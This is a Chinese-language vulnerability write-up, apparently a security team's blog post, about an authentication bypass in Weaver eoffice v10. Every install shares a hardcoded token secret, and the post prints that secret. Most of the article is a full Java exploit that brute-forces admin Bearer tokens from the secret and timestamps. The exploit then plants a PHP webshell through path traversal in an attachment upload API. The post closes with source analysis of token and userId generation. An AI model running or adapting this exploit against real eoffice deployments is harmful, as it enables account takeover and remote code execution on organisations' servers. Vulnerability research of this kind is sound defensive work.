泛微OA v10_20211213_Offline 未授权访问漏洞

文摘科技 2023-12-04 10:07 广东

“A9 Team 甲方攻防团队，成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域，持续分享安全运营和攻防的思考和实践。”

—

漏洞版本

泛微OA v10_20211213_Offline

—

漏洞描述

这个漏洞是由于泛微eoffice认证字段的生成中使用了硬编码，并且每个泛微eoffice安装时都会生成相同的硬编码，攻击者这可以通过认证字段的生成方式进行利用，从而伪造用户的登录凭据进行访问；总体来说，和泛微ecology 的任意用户登录漏洞极其类似。

—
漏洞利用

利用条件：存在在线的用户

例如：

假设：管理员已经登录

运行如下脚本，生成token

这里只是爆破了在以当前时间为基准的前15分钟和当前时间后3分钟内管理员登录的token，如果需要爆破更长时间，可以将代码中的

int count1 = 60 * 15 , 15 的值设置大一些.

利用代码如下:

package com.C0lorful.algorithm;
import java.security.MessageDigest;import java.security.NoSuchAlgorithmException;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;import java.net.HttpURLConnection;import java.net.InetSocketAddress;import java.net.Proxy;import java.net.URL;import java.nio.charset.StandardCharsets;import java.security.SecureRandom;import java.util.ArrayList;

public class VulnEoffice {
    public static ArrayList<String> generateToken() {        ArrayList<String> arrayList = new ArrayList<>();

        String tokenSecret = "HLVFscA97YMRRlVyNMvueWIBIITX8Q11";        String tokenAlgo = "SHA-512";        long theTime = System.currentTimeMillis() / 1000;
        String type = "access";        String type2 = "refresh";        String userId = "admin";        // 下面是普通用户的 userId        // String userId = "WV00000002";
        int count1 = 60 * 3;        int count2 = 60 * 3;
        long beforeTime = theTime - count1;        long afterTime = theTime + count2;
        MessageDigest digest;        try {            digest = MessageDigest.getInstance(tokenAlgo);        } catch (NoSuchAlgorithmException e) {            e.printStackTrace();            return null;        }
        // 爆破之前的        long tempTime = theTime;        while (tempTime >= beforeTime) {            String accessHash = generateHash(digest, type + userId + tempTime + tokenSecret);            String refreshHash = generateHash(digest, type2 + userId + tempTime + tokenSecret);            arrayList.add("Bearer " + accessHash);//            System.out.println(accessHash);//            System.out.println(refreshHash);            tempTime = tempTime - 1;        }
        // 爆破之后的        tempTime = theTime;        while (tempTime <= afterTime) {            String accessHash = generateHash(digest, type + userId + tempTime + tokenSecret);            String refreshHash = generateHash(digest, type2 + userId + tempTime + tokenSecret);            arrayList.add("Bearer " + accessHash);//            System.out.println("Bearer " + accessHash);//            System.out.println("Bearer " + refreshHash);            tempTime = tempTime + 1;        }        return arrayList;    }
    private static String generateHash(MessageDigest digest, String input) {        byte[] hashBytes = digest.digest(input.getBytes());        StringBuilder hexString = new StringBuilder();        for (byte b : hashBytes) {            String hex = Integer.toHexString(0xff & b);            if (hex.length() == 1) {                hexString.append('0');            }            hexString.append(hex);        }        return hexString.toString();    }
    public static void vuln(String token) {        try {            // 创建URL对象            URL url = new URL("http://172.20.10.5:8010/eoffice10/server/public/api/attachment/base64");
            // 创建代理对象            Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress("127.0.0.1", 8080));
            // 打开连接，并设置代理            HttpURLConnection connection = (HttpURLConnection) url.openConnection(proxy);
            // 设置请求方法为POST            connection.setRequestMethod("POST");            connection.setRequestProperty("Authorization", token);            connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            // 启用输出流            connection.setDoOutput(true);            String randomNumber = String.valueOf(getRandomNumber());
            String fileName = md5Generate(randomNumber);            // 设置请求体内容            String requestBody = "image_file=data:image/php;base64,PD9waHAgcGhwaW5mbygpO2M/Pg==&image_name=../../../../../www/" + fileName;            System.out.println("fileName :" + fileName + ".php");            byte[] requestBodyBytes = requestBody.getBytes(StandardCharsets.UTF_8);            connection.setRequestProperty("Content-Length", String.valueOf(requestBodyBytes.length));            connection.getOutputStream().write(requestBodyBytes);
            // 发送请求并获取响应代码            int responseCode = connection.getResponseCode();
            // 读取响应内容            BufferedReader reader = new BufferedReader(new InputStreamReader(connection.getInputStream()));            String line;            StringBuilder response = new StringBuilder();            while ((line = reader.readLine()) != null) {                response.append(line);            }            reader.close();
            // 打印响应内容和响应代码            System.out.println("Response Code: " + responseCode);            System.out.println("Response Body: " + response.toString());            connection.disconnect();
            if (responseCode == 200) {                // 打开连接，并设置代理                HttpURLConnection connection2 = (HttpURLConnection) (new URL("http://172.20.10.5:8010/" + fileName + ".php")).openConnection();                // 设置请求方法为GET                connection2.setRequestMethod("GET");                if (connection2.getResponseCode() == 200) {                    System.out.println("vlun success,the webshell url is: " + "http://172.20.10.5:8010/" + fileName + ".php");                }            }
            // 关闭连接
        } catch (IOException e) {            e.printStackTrace();        }    }
    public static void doGet(String token) {        try {            // 创建URL对象            URL url = new URL("http://172.20.10.5:8010/eoffice10/server/public/api/customer/contact-record?limit=10&page=1&withComment=1");
            // 创建代理对象            Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress("127.0.0.1", 8080));
            // 打开连接，并设置代理            HttpURLConnection connection = (HttpURLConnection) url.openConnection(proxy);
            // 设置请求方法为GET            connection.setRequestMethod("GET");            connection.setRequestProperty("Authorization", token);
            // 发送请求并获取响应代码            try {                int responseCode = connection.getResponseCode();                if (responseCode == 200) {                    // 打印响应内容和响应代码                    System.out.println("Response Code: " + responseCode);                    // 读取响应内容                    BufferedReader reader = new BufferedReader(new InputStreamReader(connection.getInputStream()));                    String line;                    StringBuilder response = new StringBuilder();                    while ((line = reader.readLine()) != null) {                        response.append(line);                    }                    System.out.println("Authorization: " + token);                    System.out.println("Response Body: " + response.toString());                    reader.close();                    vuln(token);
                }                // 关闭连接                connection.disconnect();
            } catch (Exception e) {                e.printStackTrace();            }        } catch (IOException e) {            e.printStackTrace();        }    }
    public static String md5Generate(String param) {        try {            // 获取MD5消息摘要实例            MessageDigest md = MessageDigest.getInstance("MD5");
            // 计算输入字符串的MD5哈希值            byte[] hashBytes = md.digest(param.getBytes());
            // 将哈希值转换为十六进制字符串            StringBuilder sb = new StringBuilder();            for (byte b : hashBytes) {                sb.append(String.format("%02x", b));            }            String md5Hash = sb.toString();            // 打印MD5哈希值            System.out.println("MD5 Hash: " + md5Hash);            return md5Hash;        } catch (NoSuchAlgorithmException e) {            e.printStackTrace();        }        return param;    }
    public static int getRandomNumber() {        SecureRandom secureRandom = new SecureRandom();        int randomNumber = secureRandom.nextInt();        return randomNumber;    }
    public static void main(String[] args) {        ArrayList<String> TokenList = generateToken();        for (String token : TokenList) {            doGet(token);
        }    }}

站点需要有在线用户，所以这里登录一个用户

运行脚本进行利用

运行脚本进行漏洞利用，可以看到burpsuite 上有两个利用的数据包

访问生成的webshell

—
漏洞分析

登录token 的生成代码

eoffice10/server/app/EofficeApp/Auth/Services/AuthService.php

查看用户凭证生成方式

判断登录方式

$this->isMobile())

这里移动端的判断方式比较容易绕过

pc和app 登录后token刷新时间不同

这里的 $mobile_refresh_token_ttl $web_refresh_token_ttl都是从认证配置文件 auth.php读取的

具体路径为：eoffice10/server/config/auth.php

经过多次在不同机器上安装，发现auth.php 配置文件中的键值对是不变的

if ($this->isMobile()) {            $refreshTokenTtl = config("auth.mobile_refresh_token_ttl");        } else {            $refreshTokenTtl = config("auth.web_refresh_token_ttl");        }

mobile_refresh_token_ttl——>10080

web_refresh_token_ttl——>120

return [    "token_secret" => envOverload("TOKEN_SECRET", "HLVFscA97YMRRlVyNMvueWIBIITX8Q11"),    "token_algo" => "sha512",    "login_key_secret" => "56bba8589219c78f982ba9816acefefa9cf7b0ede10c7e289769208d4cc5c2c97863e10e68087adc7c37f65ae0d0f8ffecf214813662cb5e37c438e215473592",    "web_token_ttl" => envOverload("WEB_TOKEN_TTL", 60),    "web_refresh_token_ttl" => envOverload("WEB_REFRESH_TOKEN_TTL", 120),    "mobile_token_ttl" => envOverload("MOBILE_TOKEN_TTL", 1440),    "mobile_refresh_token_ttl" => envOverload("MOBILE_REFRESH_TOKEN_TTL", 10080),    "token_grace_period" => envOverload("TOKEN_GRACE_PERIOD", 2)];

查看generateToken方法

根据上图中代码，可以发现登录的token是通过hash函数生成的

hash($tokenAlgo, $type . $userId . $tokenTime . $tokenSecret, false)

这里的 $tokenAlgo $tokenSecret 也都是从认证配置文件 auth.php读取的，这里的$tokenAlgo和$tokenSecret的值如下：

$tokenAlgo ——> sha512 $tokenSecret ——> HLVFscA97YMRRlVyNMvueWIBIITX8Q11

$type = "access"，$tokenTime = time(); 所以只需要获取$userId即可

—
获取用户userid

通过创建新用户和查看数据库的用户id号，发现如果是管理员，则userId是admin，如果为非管理员用户，那么userId为WV00000001**，**依次递增

管理员 $userId————>admin

普通用户 $userId————>WV0000000pos

下面这里是连续创建了三个用户，可以看到userId是依次按照顺序递增的

下面代码可以看到新的普通用户的userId的生成方式

通过上述代码，我们可以知道，web 端的token的默认过期时间为60分钟，移动端过期时间为24 小时。

只要拿到了用户登录的时间戳，就可以伪造登录Token，由于用户的默认token 失效时间为60分钟，所以我们可以只爆破以当前时间为基准的前60分钟和后10分钟的Token就能够遍历到网站近乎所有的在线登录用户Token，移动端的用户则可以修改请求头信息伪装为移动端用户。

http://mp.weixin.qq.com/s?__biz=MzkzNzI2Mzc0Ng==&mid=2247486035&idx=1&sn=53be0bb209d28751bca262ab6c0c93c2

A9 Team

A9 Team 甲方攻防团队，成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域，持续分享安全运营和攻防的思考和实践，期望和朋友们共同进步，守望相助，合作共赢。

最新文章

安全自动化与人工智能：网络防御的新前沿

无文件攻击利用与防范

安全运营之告警如何区分自己人

如何有效防范网络钓鱼攻击

终端防病毒系统运营过程的常见问题及应对措施

以漏洞挖掘的思路看CVE-2023-46604-ActiveMQ反序列化RCE

AI 安全运营的新篇章：Dify 的应用与实践（一）

勒索病毒演练实践

利用域控机器账户进行DCSync权限维持

表哥被钓鱼中招，教表哥如何识别钓鱼网站

记一次基于 SO 解密 Jar 包的反编译破解思路

生成式人工智能

数据安全离职审计实践分享

常见协议数据包解析

Windows日志一把梭

原型污染漏洞的简析及利用

数据安全离职审计实践分享

终端安全漏洞运营

初探威胁情报平台

CVE-2023-41892 Craft-CMS-远程代码执行漏洞

【极思】五年安全运营实践总结与未来思考

【极思】以攻促防：勒索软件攻击实战演练

K8S集群自身组件的一些安全问题

钓鱼邮件：WPS 0Day漏洞的威胁和应对

WIFI渗透

泛微OA v10_20211213_Offline 未授权访问漏洞

sqlmap也能反制？我不信

【A9】请求加密后的渗透测试方法

【A9】简单聊聊前端加密

安全运营变革：SOAR与SIEM完美融合的最佳实践

【A9】安全运营之外部事件管理

【A9】certutil，wmic命令执行敏感操作

【A9】安全运营之内部事件管理

【A9】Electron 桌面应用程序 XSS到RCE 的学习

【A9】CVE-2022-21661-WORDPRESS-SQL-注入

【A9】xred病毒感染事件

【A9】终端安全风险主要来源及防范措施

【A9】数据安全运营告警处置实践分享

【A9】数据安全运营告警处置流程实践

【A9】rke 部署K8S集群及 Rancher部署

【A9】初探应急响应

【A9】某官网应急响应排查

实践｜病毒情报自动化闭环运营

【A9】基于IPDRR网络安全框架，浅谈数据安全运营

【A9】XES-killer

【A9】工作组织架构变更引发的思考

【A9】记一次漏洞修复过程中遇到yum命令行的问题

【A9】初探eBPF

RocketMQ 最新漏洞手把手复现 CVE-2023-33246

【A9】Fastjson反序列化漏洞原理

分类

时事

民生

政务

教育

文化

科技

财富

体娱

健康

情感

旅行

百科

职场

楼市

企业

乐活

学术

汽车

时尚

创业

美食

幽默

美体

文摘

原创标签

时事社会财经军事教育体育科技汽车科学房产搞笑综艺明星音乐动漫游戏时尚健康旅游美食生活摄影宠物职场育儿情感小说曲艺文化历史三农文学娱乐电影视频图片新闻宗教电视剧纪录片广告创意壁纸头像心灵鸡汤星座命理教育培训艺术文化金融财经健康医疗美妆时尚餐饮美食母婴育儿社会新闻工业农业时事政治星座占卜幽默笑话独立短篇连载作品文化历史科技互联网

发布位置

广东北京山东江苏河南浙江山西福建河北上海四川陕西湖南安徽湖北内蒙古江西云南广西甘肃辽宁黑龙江贵州新疆重庆吉林天津海南青海宁夏西藏香港澳门台湾美国加拿大澳大利亚日本新加坡英国西班牙新西兰韩国泰国法国德国意大利缅甸菲律宾马来西亚越南荷兰柬埔寨俄罗斯巴西智利卢森堡芬兰瑞典比利时瑞士土耳其斐济挪威朝鲜尼日利亚阿根廷匈牙利爱尔兰印度老挝葡萄牙乌克兰印度尼西亚哈萨克斯坦塔吉克斯坦希腊南非蒙古奥地利肯尼亚加纳丹麦津巴布韦埃及坦桑尼亚捷克阿联酋安哥拉